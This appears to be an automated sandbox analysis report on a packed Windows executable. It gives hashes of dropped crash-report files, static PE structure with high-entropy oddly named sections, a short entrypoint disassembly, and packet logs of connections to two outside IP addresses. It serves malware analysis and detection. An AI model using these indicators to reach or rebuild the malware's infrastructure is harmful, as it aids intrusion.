                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.7.2.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC224.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4594
                                                          Entropy (8bit):4.459177916485704
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zs0zJg77aI94LWpW8VYyYm8M4J75FUX+q8VS0eEz6Ad:uIjf6I7S67VCJUXv0bz6Ad
                                                          MD5:EF947B24D9DDA0CA7F6310524361EFC4
                                                          SHA1:47A010C4C64A851382B3009FAEB10641BA33CB36
                                                          SHA-256:24BE4F932C3DEDA0E543E1A49C3C7C2E6B6F7CF645D635634A136352ECB161DD
                                                          SHA-512:8A121A77DBEAF57F66BD9C01C1F2D198EB02354BA180378499164354F493E2E079C0E761C0D0A9DAB77BC396FDC9D4AA89EB3F41CF451004D7668817C4AB0879
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639798" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.416641919763013
                                                          Encrypted:false
                                                          SSDEEP:6144:bcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNZ5+:Ai58oSWIZBk2MM6AFBTo
                                                          MD5:756D3B4B311BE713B8518E433457285A
                                                          SHA1:64C8DA85431A270FC9D995061FCEF1DB74E1345E
                                                          SHA-256:DC0A10B0A0D96229F0A5B3575D3A63ABE5E6E510BACDAF2A19AB45D03DCC5A35
                                                          SHA-512:DD84E5DA2315198795FB82165AA307CBEAF4C8C89C2E3303600D765A20907B84FD76BA539EC37AE3983A461DD355F23FE203DE265597571EBA70194F176D1209
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...`.R...............................................................................................................................................................................................................................................................................................................................................r.T........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.985304301810983
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:28PCC9oa8s.exe
                                                          File size:4'450'816 bytes
                                                          MD5:8a549f15d1418fb4207aadb4ba813a36
                                                          SHA1:9019f532acc00096055788d1212842e8bec35627
                                                          SHA256:7dc314359cdb76163923b61fc91175c7a09577e37443ca9711ba9c6b33863391
                                                          SHA512:1aadc1a1eb8715f02108a6df2b28852c58399335a4760afaa9d7637612b117b118d1f7dcbb9bdbb63a067872b7ee37669379575b51b207678cf55c2d45acfbab
                                                          SSDEEP:98304:tom43DbewIxtiiOomSa347fCM65XFKZcdow9vbFgCAuj1:m7zb4CmaOfI/xTFGy
                                                          TLSH:35263367753109BBDBC69037A3239F3698F0CD5304A5B81269D2F8F38F61A44E6F2466
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg...............(.DI..$l..2...........`I...@...................................D...@... ............................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0xfda000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x6762999F [Wed Dec 18 09:45:03 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007F9834E6C6DAh
                                                          bswap eax
                                                          inc ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x69905f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6980000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbd844c0x10souunsyz
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xbd83fc0x18souunsyz
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x6970000x284800202334f002ec09df0765630a3b6e8290unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x6980000x1ac0x200ace2ddaed2b562f8060924425d79cf3aFalse0.583984375data4.58379345694674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x6990000x10000x2008da1d90f4e8ad8e1606b904e7bc64d29False0.166015625data1.1687723252187228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x69a0000x3880000x2007d4450ea36266428ba835e7e869fc295unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          souunsyz0xa220000x1b70000x1b6600617f062e214fed4391f69211b1f2740bFalse0.9948484726974622data7.9567248280767044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          zkkgfegk0xbd90000x10000x400b35a3d915f6f672ea18ab4d97de8d240False0.7392578125data5.871955811389945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xbda0000x30000x2200717b32ab65d89a398e86ec2a16a7d048False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xbd845c0x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 17:15:14.880594015 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:14.880639076 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:14.880703926 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:14.894725084 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:14.894757986 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.633375883 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.634994984 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.635032892 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.636449099 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.636533022 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.638058901 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.638134956 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.649771929 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.649812937 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.697630882 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.971385002 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.971481085 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:16.971669912 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.989156961 CET49701443192.168.2.798.85.100.80
                                                          Dec 20, 2024 17:15:16.989216089 CET4434970198.85.100.80192.168.2.7
                                                          Dec 20, 2024 17:15:18.342150927 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.461692095 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.461771011 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.462779999 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.582554102 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582581997 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582690001 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.582714081 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582725048 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582776070 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.582870960 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582912922 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.582943916 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582954884 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582966089 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.582994938 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.583014965 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.583049059 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.583081961 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.583090067 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.583127975 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.703999996 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704020023 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704036951 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704058886 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704077005 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.704097033 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704109907 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704128981 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.704147100 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.704159021 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.704756021 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.704813957 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.749383926 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.749511957 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.869395971 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:18.869543076 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:18.917365074 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.033312082 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.033370972 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.233558893 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.233686924 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.445961952 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.446257114 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.446382046 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.567766905 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.567893028 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.567903042 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.567913055 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.567938089 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.568002939 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568012953 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568064928 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.568090916 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568128109 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.568140030 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568162918 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.568191051 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.568253994 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568294048 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568312883 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.568468094 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.569524050 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.569561958 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.569605112 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.569792986 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.569802999 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.569874048 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.569900990 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.569957972 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.570008993 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570019007 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570027113 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570063114 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.570095062 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570791960 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570866108 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570874929 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570883036 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570976973 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.570986986 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.571058035 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.571154118 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.571163893 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.572756052 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.573909044 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.573924065 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.574326038 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.574413061 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.574485064 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.574485064 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.688915968 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.688991070 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.689026117 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.689094067 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.689105988 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.689147949 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.689166069 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.689233065 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.689970016 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690043926 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690131903 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690195084 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690212965 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690278053 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690325975 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690335989 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690392971 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690737963 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690856934 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690882921 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.690948009 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.690990925 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691001892 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691010952 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691066980 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.691101074 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691111088 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691159964 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.691171885 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.691217899 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.692064047 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.692106962 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.692128897 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.692168951 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.692176104 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.692187071 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.692250967 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694359064 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694422007 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694444895 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694458961 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694510937 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694536924 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694546938 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694564104 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694612980 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694624901 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694634914 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694642067 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694703102 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694715023 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694730997 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694767952 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694778919 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694788933 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694823027 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694863081 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.694919109 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694928885 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694977045 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.694983959 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.695004940 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.695080996 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.695127964 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.695187092 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.695231915 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.695240974 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.695286989 CET8049703185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:19.695293903 CET4970380192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:19.695362091 CET4970380192.168.2.7185.121.15.192
